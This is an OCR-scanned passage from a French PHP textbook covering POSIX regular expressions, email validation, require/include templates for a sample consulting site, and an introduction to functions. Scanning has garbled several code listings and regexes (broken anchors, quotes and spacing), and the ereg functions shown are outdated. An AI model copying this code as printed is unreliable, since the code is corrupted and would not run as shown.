Repetition 1 ou plusieurs fois 


{ 


Debut d'un quantificateur min/max 


} 


Fin d'un quantificateur min/max 


? 


Marque un sous-motif comme etant facultatif 


Tableau 4.5 : 


: Recapitulatif sur les caracteres speciaux utilises dans des expressions 


regulieres POSIX, entre crochets 


Caractere 


Signification 


\ 


Caractere de protection 



NON, seulement lorsqu'il est utilise en position initiale 
Utilise pour specifier des plages de caracteres 



Application au cas du formulaire "intelligent" de courrier electronique 

Dans le cadre de notre formulaire de courrier electronique, nous pouvons envisager au 
moins deux usages possibles des expressions regulieres. Nous pourrions tout d'abord y 
avoir recours pour ameliorer le dispositif precedernment propose pour la detection de 
termes particuliers dans les messages envoyes par les clients. En utilisant une fonction 
de traitement des chaines, comme nous l'avons deja suggere, il nous faudrait effectuer 
trois recherches differentes pour tester la presence des expressions "boutique", 
"service client" et "ventes" alors que toutes les trois peuvent etre capturees par une 
seule expression reguliere : 

boutique | service client | ventes 
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La seconde utilisation envisageable est la validation des adresses de courrier electroni- 
que des clients. II faut pour cela coder le format standard d'une adresse de courrier elec- 
tronique dans une expression reguliere. Le codage de ce format doit representer la 
sequence suivante : des caracteres alphanumeriques et de ponctuation, suivis par un 
symbole @ , puis par des caracteres alphanumeriques et des tirets, suivis par un point, 
puis par plusieurs caracteres alphanumeriques et des tirets et, eventuellement, plusieurs 
points, jusqu'a la fin de la chaine. Concretement, ce format pourrait etre code de la 
maniere suivante : 

A [a-zA-Z0-9_\-\. ]+@[a-zA-Z0-9\-]+\ . [a-zA-Z0-9\-\ . ]+$ 
La sous-expression " [ a zA Z0 9 \ \ . ] + signifie "la chaine doit commencer par une 
lettre, un nombre, un blanc souligne, un tiret, un point ou toute combinaison de ces 
caracteres". Notez que, lorsqu'un point est utilise au debut ou a la fin d'une classe de 
caracteres, il perd sa signification speciale de caractere de remplacement et devient un 
simple point litteral. 

Le symbole @ represente un caractere @ litteral. 

La sous-expression [a zA Z0 9\ ]+ decrit la premiere partie du nom d'hote. Celle-ci 
doit etre composee de caracteres alphanumeriques et de tirets. Notez que le tiret, qui est 
un caractere special, est precede ici d'une barre oblique inversee parce qu'il est place 
entre crochets. 

La combinaison \ . represente un point litteral (.). Nous utilisons un point en dehors des 
classes de caracteres, aussi devons-nous le proteger pour ne defmir de correspondance 
qu'avec un point litteral. 

La sous-expression [a zA Z0 9\ \ . ] +$ represente le reste d'un nom de domaine. Cette 
partie peut etre composee de lettres, de nombres, de tirets et de plusieurs points si 
necessaire, jusqu'a la fin de la chaine. 

Une analyse un tant soit peu poussee montrerait que certaines adresses de courrier elec- 
tronique non valides pourraient etre decrites par cette expression reguliere. II est pres- 
que impossible de dresser la liste de toutes ces adresses mais notre code en elimine 
quand meme un bon nombre. Notre expression peut etre encore affmee de nombreuses 
manieres. II est par exemple possible de lister tous les TLD valides. Soyez tout de 
meme prudent avant d'etre trop restrictif, car une fonction de validation qui rejette 1 % 
de donnees valides procure plus d'ennuis qu'une autre qui accepte 10 % de donnees 
non valides. 

Maintenant que nous avons defini la notion d' expression reguliere, nous allons passer 
en revue les fonctions PHP qui permettent de les utiliser. 
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Recherche de sous-chames au moyen d'expressions regulieres 

La recherche de sous-chaines est la principale application des expressions regulieres 
decrites dans les sections precedentes. Les deux fonctions de PHP pour rechercher des 
expressions regulieres POSIX s'appellent ereg() et eregi(). 

Le prototype de la fonction ereg ( ) est le suivant : 

int eregfstring motif, string chaine, array [resultat]); 

La fonction ereg() parcourt chaine afin d'y rechercher des occurrences de l'expres- 
sion reguliere motif. Les sous-chaines ainsi detectees sont enregistrees dans le tableau 
resultat a raison d'une sous-expression par element du tableau. 

La fonction eregi ( ) est identique a la fonction ereg ( ) , sauf qu'elle n'est pas sensible a 
la casse. 

Notre formulaire de courrier electronique peut etre modifie en y introduisant des 
expressions regulieres : 

if ( ! eregi ( ' A [a-zA-Z0-9_\-\ . ]+@[a-zA-Z0-9\-]+\ . [a-zA-Z0-9\-\ . ]+$' , $email) ) 
{ 

echo "<p>Ceci n'est pas une adresse email correcte.</p>" . 
"<p>Revenez a la page precedente et reessayez.</p>" ; 

exit; 

} 

$adresse_dest = "commentaires@exemple.com 1 ; // Adresse par defaut 
if (eregi( ' boutique | service client |ventes ' , $commentaire) ) { 

$adresse_dest = "ventes@exemple.com"; 
} else if (eregi( ' livraison [ traitement ' , $commentaire) ) 

$adresse_dest = 'traitements@exemple.com"; 
} else if (eregi( 'facture|compte' , $commentaire) ) 

$adresse_dest = "comptes@exemple.com"; 

} 

if (eregi( ' grosclient\ .com ' , $email)) 
$adresse_dest = "bob@exemple.com"; 

} 

Remplacement de sous-chaines au moyen d'expressions regulieres 

Vous pouvez egalement utiliser des expressions regulieres pour rechercher et remplacer 
des sous-chaines, tout comme nous l'avons deja fait au moyen de la fonction 
str replace. Les deux fonctions PHP dediees a ce type d'operation de recherche/ 
remplacement sont ereg replace ( ) et eregi replace ( ). Le prototype de la fonction 
ereg replace ( ) est le suivant : 

string ereg_replace(string motif, string remplacement, string chaine); 

Cette fonction cherche dans chaine les occurrences de l'expression reguliere motif et 
les remplace par la chaine remplacement. 
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La fonction eregi replace () est identique a la fonction ereg replace (), sauf qu'elle 
n'est pas sensible a la casse. 

Decoupage de chaTnes au moyen d'expressions regulieres 

La fonction split () est une autre fonction de traitement d'expression reguliere tres 
utile. Son prototype est le suivant : 

array split(string motif, string chaine, int [max]); 

Cette fonction decoupe chaine en sous-chaines au niveau des sous-chaines correspon- 
dant a l'expression reguliere motif. Elle renvoie les sous-chaines obtenues sous la 
forme d'un tableau. Le parametre entier max limite le nombre d'elements qui peuvent 
etre contenus dans le tableau. 

Par exemple, la fonction split () pourrait etre mise en ceuvre pour decomposer les 
adresses e-mail, les noms de domaine ou les dates : 

$adresse = "utilisateunaexemple.com"; 
$tab = split ('\.|@', $adresse); 
while (list($cle, $valeur) = each ($tab)) { 
echo "<br />" . $valeur; 

} 

Ce code decompose l'adresse en ses cinq composantes et affiche chacune d'elles sur 
une ligne separee : 

utilisateur 

e 

exemple 
com 



— Info 

En general, les fonctions des expressions regulieres s'executent moins vite que les fonctions 
equivalentes sur les chaTnes. Si votre traitement est suffisamment simple pour se contenter 
d'une fonction sur les chaines, n'hesitez pas. Cela peut ne plus etre vrai si le traitement peut 
etre realise par une seule expression reguliere, mais par plusieurs fonctions sur les chaines. 



Pour aller plus loin 

PHP compte de nombreuses fonctions sur les chaines. Nous n'avons ici aborde que les 
plus utiles mais, si vous avez un besoin particulier (la conversion de caracteres latins 
dans l'alphabet cyrillique, par exemple), consultez le manuel en ligne afm de voir si le 
PHP dispose de la fonction recherchee. 
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La litterature et les ressources consacrees aux expressions regulieres sont innombra- 
bles. Si vous utilisez Unix, vous pouvez commencer par la page man intitulee regexp. 
Vous trouverez egalement des articles precieux sur les sites devshed.com et phpbuil- 
der.com. 

Le site web de Zend propose une fonction de validation des courriers electroniques plus 
complexe et plus puissante que celle developpee dans le cadre de notre exemple. Cette 
fonction s'appelle MailVal() ; elle est disponible a l'URL http://www.zend.com/ 
codex.php?id=88&single=l . 

Vous aurez besoin d'un peu de pratique pour bien exploiter les expressions regulieres. 
Plus vous vous exercerez dans le domaine et mieux vous saurez les manier. 

Pour la suite 

Nous etudierons au prochain chapitre plusieurs manieres d'utiliser PHP pour economi- 
ser du temps et des efforts de programmation et empecher la redondance en reutilisant 
du code preexistant. 



5 



Reutilisation de code 
et ecriture de fonctions 

Ce chapitre explique comment reutiliser du code pour developper des applications plus 
coherentes, plus fiables et plus faciles a gerer, avec moins d'efforts. Nous examinerons 
des techniques de modularisation et de reutilisation du code, en commencant par la 
simple mise en ceuvre des fonctions require () et include () pour utiliser le meme 
code dans plusieurs pages. Nous expliquerons pourquoi cette technique est meilleure 
que les inclusions cote serveur. L'exemple donne expliquera comment utiliser des 
fichiers include arm d'obtenir une apparence coherente sur tout un site web. 

Nous montrerons egalement comment ecrire et appeler ses propres fonctions en prenant 
a titre d'exemple des fonctions generant des pages et des formulaires. 

Avantages de la reutilisation du code 

L'un des buts recherches par les developpeurs consiste a reutiliser du code au lieu d'en 
ecrire du nouveau. Non pas qu'ils soient particulierement paresseux, mais la reutilisa- 
tion de code existant tend a reduire les cotits, a augmenter la fiabilite des programmes et 
a ameliorer leur coherence. Dans 1' ideal, un nouveau projet devrait etre conduit en 
combinant des composants logiciels reutilisables existants, avec un minimum de nouveau 
developpement. 

Cout 

Sur la duree de vie d'un composant logiciel, le temps passe a sa maintenance, a sa 
modification, a son test et a sa documentation excede largement le temps initialement 
consacre a son developpement. Concernant le code commercial, il est fortement recom- 
mande de limiter le nombre de lignes de code en usage au sein d'une entreprise. 
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Une des meilleures methodes pour observer cette recommandation consiste a reutiliser 
du code deja existant au lieu d'ecrire une version legerement differente d'un morceau 
de code existant pour accomplir une nouvelle tache. Une reduction du volume du code 
se traduit directement par une reduction des couts. S'il existe sur le marche un logiciel 
repondant aux objectifs d'un nouveau projet, achetez-le. Le prix des logiciels existants 
est presque toujours inferieur au cout de developpement d'un projet equivalent. Si un 
programme existant correspond "presque" a vos besoins, vous devrez toutefois exami- 
ner soigneusement les modifications qui devront lui etre apportees, car modifier du 
code existant peut etre plus difficile qu'ecrire du nouveau code. 

Fiabilite 

Lorsqu'un module de code est utilise au sein d'une entreprise, c'est generalement apres 
avoir fait l'objet de tests serieux. Meme si un composant logiciel ne requiert que quel- 
ques lignes de code, vous courez le risque, en le reecrivant, d'oublier un point pris en 
compte par l'auteur du composant existant ou de negliger une correction apportee au 
code d'origine apres que les tests ont mis en evidence un defaut. Le code mature, existant, 
est generalement plus fiable que le code encore "vert". 

Coherence 

Les interfaces externes vers votre systeme, y compris les interfaces utilisateur et les 
interfaces vers des systemes externes, doivent etre coherentes. II faut de l'opiniatrete et 
des efforts deliberes pour ecrire du nouveau code qui reste coherent avec les autres 
parties du systeme. En revanche, si vous reutilisez du code deja en service dans une 
autre partie du systeme, vous avez toutes les chances pour que la fonctionnalite obtenue 
soit automatiquement coherente. 

Un avantage essentiel de la reutilisation du code est qu'elle minimise la charge de 
travail du developpeur, mais a condition que le code d'origine soit modulaire et bien 
ecrit. Lorsque vous programmez, faites en sorte d'identifier les sections de votre code 
susceptibles de servir ulterieurement dans d' autres applications. 

Utilisation des instructions requireQ et indudef) 

PHP offre deux instructions tres simples et neanmoins tres utiles qui permettent de 
reutiliser tout type de code. Par le biais d'une instruction require () ou include(), 
vous pouvez charger un fichier dans un script PHP. Le fichier ainsi charge peut contenir 
tout ce qui pourrait normalement etre inclus dans un script, y compris des instructions 
PHP, du texte, des balises HTML, des fonctions PHP ou des classes PHP. 

Les instructions require ( ) et include ( ) fonctionnent a la maniere des inclusions cote 
serveur offertes par de nombreux serveurs web et des instructions #include des langages C 
et C++. 
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Ces deux instructions sont quasiment identiques. La seule difference est que require ( ) 
provoque une erreur fatale lorsqu'elle echoue, alors que include() ne produit qu'un 
message d'avertissement. 

require once() et include once() sont des variantes de require () et include(). 
Leur but consiste a s'assurer qu'un fichier inclus ne le sera qu'une seule fois, ce qui 
devient particulierement utile lorsque Ton utilise require ( ) et include ( ) pour inclure 
des bibliotheques de fonctions. L' utilisation de ces deux variantes vous empeche alors 
d' inclure accidentellement la meme bibliotheque deux fois, ce qui provoquerait la 
redefinition de ses fonctions et done une erreur. Si vous etes suffisamment rigoureux, 
vous avez tout interet a preferer require () ou include () car elles s'executent plus 
rapidement. 

Extensions des noms de fichiers et require() 

Supposons que le code suivant soit stocke dans le fichier reutilisable.php : 
<? 

echo "Ceci est une instruction PHP tres simple. <br />"; 

?> 

et que le fichier principal.php ait le contenu suivant : 
<? 

echo "Ceci est le fichier principal. <br />"; 
require( 'reutilisable.php' ); 
echo "Fin du script. <br />"; 

?> 

Si vous chargez directement reutilisable.php dans votre navigateur web, vous ne serez 
pas surpris de le voir afficher la phrase Ceci est une instruction PHP tres simple. En 
revanche, le chargement de principal.php a un effet un peu plus inattendu. Le resultat 
obtenu est montre a la Figure 5.1. 



MozillaFirefox 

Ceci est lc fichier principal. 

Ceci est une instruction PHP tres simple. 

Fin du script. 



Termine A 



Une instruction require () exige un fichier. Dans l'exemple precedent, nous avons 
utilise le fichier appele reutilisable.php. A l'execution du script, l'instruction 
require( ) : 

require( 'reutilisable.php' ); 



tigure a. ; 

Le chargement du fichier 
principal.php fait apparaitre 
le resultat de /'instruction 
requireQ. 
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est remplacee par le contenu du fichier indique, puis le script contenu dans ce dernier 
est alors execute. L' execution qui s'opere au chargement du fichier principal. php est 
done equivalente a 1' execution du script suivant : 

<? 

echo "Ceci est le fichier principal. <br />"; 
echo "Ceci est une instruction PHP tres simple. <br />"; 
echo "Fin du script. <br />"; 
?> 

Pour bien utiliser 1' instruction require (), vous devez connaitre la maniere dont sont 
traitees les extensions des noms de fichier et les balises PHP. 

PHP ignore 1' extension du nom du fichier qui est charge au moyen de la fonction 
require ( ) . Par consequent, vous pouvez donner a ce fichier le nom qui vous convient 
du moment que vous ne comptez pas l'appeler directement. Lorsque le fichier est 
charge par require ( ) , celui-ci devient partie integrante d'un fichier PHP et est execute 
en tant que tel. 

Generalement, des instructions PHP contenues dans un fichier appele, par exemple, 
page.html ne seront pas traitees. PHP ne traite normalement que les fichiers dont les 
noms portent des extensions definies, comme . php (ce comportement peut etre modifie 
dans le fichier de configuration de votre serveur web). Toutefois, si le fichier page . html 
est charge via la fonction require (), toute instruction PHP contenue dans ce fichier 
sera traitee PHP. Par consequent, vous pouvez choisir n'importe quelle extension pour 
les fichiers a inclure via require(). II est toutefois recommande de s'en tenir a une 
convention logique pour le choix des noms de fichier (par exemple en adoptant syste- 
matiquement l'extension . inc ou . php pour tous les fichiers a inclure). 

Attention : lorsque des fichiers portant une extension non standard, telle que . inc, sont 
stockes dans l'arborescence des documents du serveur, les utilisateurs qui les chargent 
directement dans leur navigateur pourront visualiser leur contenu en texte clair, y 
compris les mots de passe qui y sont eventuellement contenus ! Par consequent, il est 
important de conserver ce type de fichier en dehors de l'arborescence des documents ou 
bien alors d'employer des extensions standard. 



— Info 

Dans I'exemple considere plus haut, le fichier reutilisable reutilisable.php avait le contenu 
suivant : 

<? 

echo "Ceci est une instruction PHP tres simple. <br />"; 

?> 

Le code PHP de ce fichier est encadre par des balises PHP, ce qui est indispensable pour que 
le code d'un fichier charge via require ( ) soit traite par I'interpreteur PHP. En I'absence de 
ces balises, le code sera considere comme du texte ou du code HTML et ne sera pas execute. 
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Utilisation requireQ pour creer des modeles de site web 

Si les pages de votre site web doivent avoir une presentation et un style coherents, vous 
pouvez utiliser require ( ) pour ajouter un modele et des elements standard a toutes les 
pages. 

Par exemple, considerons le cas d'une entreprise Active, appelee TLA Consulting, dont 
le site contient tout un jeu de pages ressemblant a celle de la Figure 5.2. Lorsqu'une 
nouvelle page doit etre ajoutee au site, le developpeur peut ouvrir une page existante, 
effacer le texte contenu dans le milieu du fichier, entrer un nouveau texte, puis enregistrer 
le fichier sous un nouveau nom. 



' n n O TLA Consulting CD 

Q | > y CO) (Xj ( U ' Http://localhost/~jacQ/cH a ^T ) - (KKgcQ ') (£3) 



o 


TLA Consulting 


o 


| O Accueil 


O Contacts 


O Services 


O Carte du site | 



Bienvenue sur le site de TLA Consulting. Prenez le temps de nous connaitre. 

Nous sommes specialises dans I'aide aux decisions et nous esperons que vous ferez 
bientot appel a nous. 



© TLA Consulting 
Consultaz la page sur not Informations lagalaa 



Termin4 A 

Figure 5.2 

L'entreprise TLA utilise une presentation homogene pour toutes les pages de son site web. 

Considerez le scenario suivant : le site web est en service depuis un certain temps deja 
et contient a present des centaines, voire des milliers de pages, toutes construites sur le 
meme style. Supposez qu'il soit decide de proceder a une modification de l'apparence 
standard, meme mineure, comme l'ajout d'une adresse de courrier electronique en bas 
de chaque page ou d'une nouvelle entree dans le menu de navigation. Voulez-vous vous 
trouver dans la situation de devoir modifier des centaines, voire des milliers de pages ? 

La reutilisation des sections HTML communes a toutes les pages est de loin preferable 
a des operations de couper/coller a reproduire sur des centaines ou des milliers 
de pages. Le code source de la page d'accueil montree a la Figure 5.2 est presente dans 
le Listing 5.1. 
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Listing 5.1 : accueil.html — Le code HTML de la page d'accueil du site TLA Consulting 



<html> 
<head> 

<title>TLA Consulting</title> 
<style type="text/css"> 

hi {color:white; font-size : 24pt ; text-align : center; 

font- family : arial , sans-serif} 
.menu {color:white; font-size: 12pt; text-align:center; 

f ont -family : arial, sans-serif ; font -weight : bold} 
td {background:black} 

p {color: black; font-size : 1 2pt ; text-align: justify; 

font -family : arial, sans-serif } 
p. foot {color:white; font-size:9pt; text-align:center; 

f ont- family : arial, sans-serif ; font -weight : bold} 
a: link, a: visited, a: active {color: white} 
</style> 
</head> 
<body> 
<!-- Entete de page --> 

<table width="100%" cellpadding="12" cellspacing="0" border="0"> 
<tr bgcolor="black"> 

<td align="left"><img src="logo.gif " alt="Logo TLA" height="70" 
width="70"x/td> 

<td> 

<h1 >TLA Consulting</h1> 
</td> 

<td align="right"><img src="logo.gif " alt="Logo TLA" height="70" 
width="70"></td> 

</tr> 
</table> 

<!-- Menu --> 

<table width="100%" bgcolor="white" cellpadding="4" cellspacing="4"> 
<tr > 

<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class="menu">Accueil</span></td> 
<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class=" menu ">Cont act s</span></td> 
<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class="menu">Services</spanx/td> 
<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class="menu">Carte du site</span></td> 
</tr> 
</table> 

<!-- Contenu de la page --> 

<p>Bienvenue sur le site de TLA Consulting. 

Prenez le temps de nous connaitre.</p> 

<p>Nous sommes specialises dans l'aide aux decisions et 

nous esperons que vous ferez bientot appel a nous.</p> 



Chapitre 5 



Reutilisation de code et ecriture de fonctions 1 51 



<!-- Pied de page --> 

<table width="100%" bgcolor="black" cellpadding="12" border="0"> 
<tr> 
<td> 

<p class="f oot">&copy ; TLA Consulting</p> 
<p class="foot">Consultez la page sur nos 

<a href="legal.php">informations legales</a></p> 
</td> 
</tr> 
</table> 
</body> 
</html> 



Le Listing 5.1 se compose de plusieurs sections de code bien distinctes. L'en-tete 
HTML contient les definitions CSS (Cascading Style Sheet) utilisees dans la page. La 
section intitulee "Entete de page" affiche le nom et le logo de l'entreprise, la section 
"Menu" cree la barre de navigation de la page, tandis que la section "Contenu de la 
page" rassemble le texte specifique a cette page. Vient ensuite le pied de page. Nous 
allons scinder ce fichier en trois parties que nous enregistrerons respectivement dans les 
fichiers entete. php, accueil.php et pied.php. Les fichiers entete. php et pied.php 
contiendront alors le code que nous reutiliserons pour produire d'autres pages. 

Le fichier accueil.php remplace le fichier accueil.html ; il renferme le contenu textuel 
specifique de la page ainsi que deux instructions require ( ). Le contenu de ce fichier 
est presente dans le Listing 5.2. 

Listing 5.2 : accueil.php — Le code PHP de la page d'accueil du site web de TLA Consulting 



<?php 

require ( "entete .php" ) ; 

?> 

<!-- Contenu de la page --> 
<p>Bienvenue sur le site de TLA Consulting 
Prenez le temps de nous connaitre.</p> 
<p>Nous sommes specialises dans l'aide aux 
nous esperons que vous ferez bientot appel 

<?php 

require( 'pied.php' ) ; 

?> 



Les instructions require () du Listing 5.2 provoquent le chargement des fichiers 
entete.php et pied.php. 

Comme nous l'avons deja mentionne, les noms attribues a ces fichiers n'ont pas d'inci- 
dence sur la maniere dont les fichiers seront traites lorsque le chargement s'effectue 
via une instruction require(). Lextension .inc (pour "inclure", ou include) est tres 



decisions et 
a nous.</p> 
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souvent adoptee pour ces types de fichiers, qui sont appeles a etre inclus dans d'autres 
fichiers. Nous ne recommandons pas cette convention comme une strategic generale car 
les fichiers . inc ne seront pas interpretes comme du code PHP, sauf si le serveur a ete 
specifiquement configure pour cela. 

Par ailleurs, l'usage consiste generalement a rassembler les fichiers inclus dans un 
repertoire visible des scripts, mais qui ne permette pas leur chargement individuel via le 
serveur web, c'est-a-dire a l'exterieur de l'arborescence des documents du serveur. 
Cette pratique est fortement recommandee. En effet, le chargement individuel de ces 
fichiers peut provoquer des erreurs si l'extension des fichiers est . php et que les fichiers 
ne contiennent que des pages ou des scripts partiels, ou il peut permettre a des tiers de 
lire le code source lorsqu'une extension autre que . php est employee. 

Le fichier entete.php contient les definitions CSS utilisees par la page ainsi que les 
tableaux qui affichent le nom de l'entreprise et les barres de navigation. Son contenu est 
donne dans le Listing 5.3. 

Listing 5.3 : entete.php — L'en-tete reutilisable par toutes les pages du site web de TLA 
Consulting 



<html> 
<head> 

<title>TLA Consulting</title> 
<style type="text/css"> 

hi {color:white; font-size : 24pt ; text-align:center; 

font -family : arial, sans-serif } 
.menu {color:white; font-size: 12pt; text-align:center; 

f ont -family : arial, sans-serif ; font -weight : bold} 
td {background:black} 

p {color:black; font-size : 1 2pt ; text-align: justify; 

font -family : arial, sans-serif } 
p. foot {color:white; font-size:9pt; text-align:center; 

f ont- family : arial, sans-serif ; font -weight : bold} 
a: link, a: visited, a: active {color : white} 
</style> 
</head> 
<body> 
<!-- Entete de page --> 

<table width="100%" cellpadding="12" cellspacing="0" border="0"> 
<tr bgcolor="black"> 

<td align="left"><img src="logo.gif " alt="Logo TLA" height="70" 
width="70"x/td> 

<td> 

<h1 >TLA Consulting</h1> 
</td> 

<td align="right"><img src="logo.gif " alt="Logo TLA" height="70" 
width="70"x/td> 

</tr> 
</table> 

<!-- Menu --> 
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<table width="100%" bgcolor="white" cellpadding="4" cellspacing="4"> 
<tr > 

<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class="menu">Accueil</span></td> 
<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class=" menu ">Cont act s</span></td> 
<td width="25%"> 

<img src="s-logo.gif " alt="" height="20" width="20"> 
<span class="menu">Services</span></td> 
<td width="25%"> 

<img src="s-logo.gif" alt="" height="20" width="20"> 
<span class="menu">Carte du site</span></td> 
</tr> 
</table> 



Le fichier pied.php contient le tableau utilise pour afficher le pied de page en bas de 
chaque page. II est presente dans le Listing 5.4. 

Listing 5.4 : pied.php — Le pied de page reutilisable par toutes les pages du site web 
de TLA Consulting 



<!-- Pied de page --> 
<table width="100%" bgcolor="black" cellpadding="12" border="0"> 
<tr> 
<td> 

<p class="f oot">&copy ; TLA Consulting</p> 
<p class="foot">Consultez la page sur nos 

<a href =" legal . php">inf ormations legales</a></p> 
</td> 
</tr> 
</table> 
</body> 
</html> 



Une telle approche permet d'obtenir facilement une presentation et une apparence 
homogenes sur tout un site. Une nouvelle page concue dans le meme style peut ainsi 
etre aisement generee en quelques lignes de code : 

<?php require( 'entete.php' ) ; ?> 
Mettre ici le contenu de cette page 
<?php require( 'pied.php' ) ; ?> 

Plus important encore, meme lorsque de nombreuses pages ont ainsi ete produites a 
partir des memes fichiers d'en-tete et de pied de page, vous pouvez facilement modifier 
ces fichiers modeles. Que la modification apportee soit mineure ou qu'elle vise a 
donner une apparence completement nouvelle au site, elle ne devra etre apportee 
qu'une seule fois. Cette technique evite d' avoir a traiter chaque page separement. 



154 Partiel 



Utilisation de PHP 



Dans l'exemple considere ici, le corps, l'en-tete et le pied de page de chaque page ne 
contiennent que du HTML pur. Des instructions PHP pourraient toutefois etre utilisees 
pour produire dynamiquement certaines parties des pages web du site. 

Si vous souhaitez etre sur qu'un fichier sera traite comme du texte brut ou du HTML et 
qu'aucun code PHP ne sera execute, vous pouvez utiliser readfile() a la place de 
require () car cette fonction affiche le contenu d'un fichier sans l'analyser. II peut 
s'agir d'une mesure de precaution importante si vous utilisez du texte fourni par l'utili- 
sateur. 

Utilisation des options de configuration auto _prepend_file et 
auto_append_file 

II existe une autre maniere d'utiliser l'instruction require ( ) ou include ( ) pour ajouter 
un en-tete et un pied de page a chaque page. Le fichier de configuration php.ini contient 
deux options de configuration, auto prepend file et auto append file, qui peuvent 
etre initialisees avec, respectivement, le nom de notre fichier d'en-tete et celui du pied 
de page, de sorte que ces fichiers seront systematiquement charges au debut et a la fin 
de chaque page. Les fichiers inclus par ces directives se comportent comme s'ils avaient 
ete ajoutes en utilisant une instruction include () ; autrement dit, si le fichier est 
manquant, cela produira un message d'avertissement. 

Sur un systeme Windows, le parametrage de ces options s'effectuerait de la maniere 
suivante : 

auto_prepend_f ile = "c:/Program Files/Apache Group/Apache2//include/entete.php" 
auto_append_f ile = "c: /Program Files/Apache Group/Apache2/include/pied.php" 

Sur une plate-forme Unix, ces options se parametrent de la facon suivante : 

auto_prepend_f ile = ' /home/utilisateur/include/entete.php' 
auto_append_f ile = ' /home/utilisateur/include/pied.php' 

Lorsque ces directives sont indiquees dans le fichier php.ini, il n'est plus necessaire de 
faire appel aux instructions include ( ) . En revanche, les en-tetes et les pieds de page ne 
sont plus facultatifs dans les pages web. 

Avec un serveur web Apache, vous pouvez definir des options de configuration comme 
celles decrites precedemment pour chaque repertoire individuel. Pour cela, vous devez 
configurer votre serveur de sorte que ses principaux fichiers de configuration soient 
"ecrasables". Pour configurer PHP afin qu'il charge automatiquement des fichiers au 
debut et a la fin de chaque page pour un repertoire specifique, creez dans ce repertoire 
un fichier appele .htaccess et placez-y les deux lignes suivantes : 

php_value auto_prepend_f ile ' /home/utilisateur/include/entete . php ' 
php_value auto_append_f ile ' /home/utilisateur/include/pied.php' 
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Notez que la syntaxe differe legerement de celle utilisee plus haut pour la meme option 
dans le fichier php.ini ; outre la presence de php value au debut de la ligne, il n'y a plus 
de signe egal. Plusieurs autres parametres de configuration de php.ini peuvent etre 
modifies de la sorte. 

La definition d'options dans le fichier .htaccess et non dans le fichier php.ini ou dans le 
fichier de configuration du serveur web procure une grande souplesse. Vous pouvez 
ainsi modifier le parametrage sur une machine partagee en n'affectant que vos seuls 
repertoires. II n'est pas necessaire de redemarrer le serveur web ni de beneficier d'un 
acces d'administrateur systeme. L'approche .htaccess a toutefois 1' inconvenient que les 
fichiers sont lus et analyses a chaque fois qu'un fichier est sollicite dans le repertoire 
concerne, au lieu d'etre lus et analyses une seule fois au demarrage. Elle a done un cout 
en terme de performances. 

Utilisation de fonctions en PHP 

Les fonctions existent dans la plupart des langages de programmation. Elles servent a 
separer le code qui accomplit une tache unique et bien dermic Les fonctions rendent le 
code plus lisible et permettent de le reutiliser a chaque fois qu'une meme tache doit etre 
accomplie. 

Une fonction est un module de code autonome associe a une interface d'appel. Elle 
accomplit un certain traitement et renvoie eventuellement un resultat. 

Nous avons deja etudie plusieurs fonctions. Dans les chapitres precedents, nous avons 
regulierement appele des fonctions predefinies de PHP. Par ailleurs, nous avons nous- 
memes ecrit quelques fonctions simples, sans toutefois entrer dans les details. Dans les 
sections suivantes, nous allons nous pencher plus attentivement sur l'appel et 1' ecriture 
de fonctions. 

Appel de fonctions 

L'appel de fonction le plus simple qui soit est le suivant : 
nom_f onction ( ) ; 

Cette ligne de code appelle la fonction nom fonction, qui ne prend pas de parametre. 
Elle ignore toute valeur eventuellement renvoyee par la fonction. 

Un certain nombre de fonctions sont appelees exactement de cette maniere. Par exem- 
ple, e'est le cas de la fonction phpinf o ( ) , qui est tres utile lors des tests puisqu'elle affi- 
che la version installee de PHP, les informations relatives a PHP, la configuration du 
serveur web et les valeurs des diverses variables de PHP et du serveur. Cette fonction ne 
prend aucun parametre et la valeur qu'elle renvoie est le plus souvent ignoree. 
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L'appel de la fonction phpinf o( ) s'ecrit done de la maniere suivante : 
phpinfo( ) ; 

La plupart des fonctions requierent cependant un ou plusieurs parametres qui fournis- 
sent les informations necessaries a l'accomplissement de la tache et qui influencent le 
resultat de l'execution de la fonction. Les parametres sont passes a une fonction sous la 
forme de donnees ou de noms de variables contenant ces donnees. lis sont places dans 
une liste entre parentheses, a la suite du nom de la fonction. L'appel d'une fonction 
prenant un seul parametre s'effectue done de la facon suivante : 

nom_f onction ( ' parametre ' ) ; 

Ici, le parametre est une chaine contenant seulement le mot parametre. Les appels de 
fonction qui suivent sont egalement valides, selon la fonction appelee : 

nom_fonction (2); 
nom_fonction (7.993); 
nom_fonction ($variable); 

Dans la derniere de ces trois lignes de code, $variable peut etre une variable PHP de 
tout type, y compris un tableau ou un objet. 

Les parametres peuvent etre de n'importe quel type, mais certaines fonctions exigent 
generalement des types de donnees specifiques. 

Le prototype d'une fonction decrit le nombre de parametres requis ainsi que la signifi- 
cation et le type de chacun d'eux. Cet ouvrage donne generalement le prototype de 
chaque fonction decrite. 

Le prototype de la fonction f open ( ) , par exemple, est le suivant : 

resource fopen( string nomFichier , string mode, 

[, bool utiliser_include_path [, resource contexte]] ) 

Le prototype d'une fonction fournit de precieuses indications sur la fonction, qu'il est 
important de savoir interpreter. Dans le prototype de la fonction fopen(), le terme 
resource place avant le nom de la fonction indique qu'elle renvoie une ressource 
(un descripteur de fichier ouvert). Les parametres de la fonction sont indiques entre 
parentheses. Comme le montre ce prototype, fopen() attend done quatre parame- 
tres. Les parametres nomFichier et mode sont des chames, tandis que le parametre 
utiliser include path est un booleen et que le parametre contexte est une 
ressource. La presence de crochets de part et d' autre des parametres 
utiliser include path et contexte indique que ces parametres sont facultatifs : vous 
pouvez leur fournir une valeur ou les ignorer, auquel cas PHP utilisera une valeur par 
defaut. Notez toutefois que, lorsqu'une fonction a plusieurs parametres facultatifs, vous 
ne pouvez ignorer que les parametres places a droite. Lorsque vous appelez fopen( ), 
par exemple, vous pouvez ignorer simplement contexte ou utiliser include path et 
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contexte, mais vous ne pouvez pas ignorer utiliser include path tout en fournissant 
contexte. 

D'apres le prototype de fopen(), nous pouvons affirmer que l'appel de cette fonction 
est correct dans le fragment de code qui suit : 

$nom = 'monfichier.txt'; 

$mode_ouverture = 'r'; 

$fp = fopen($nom, $mode_ouverture) ; 

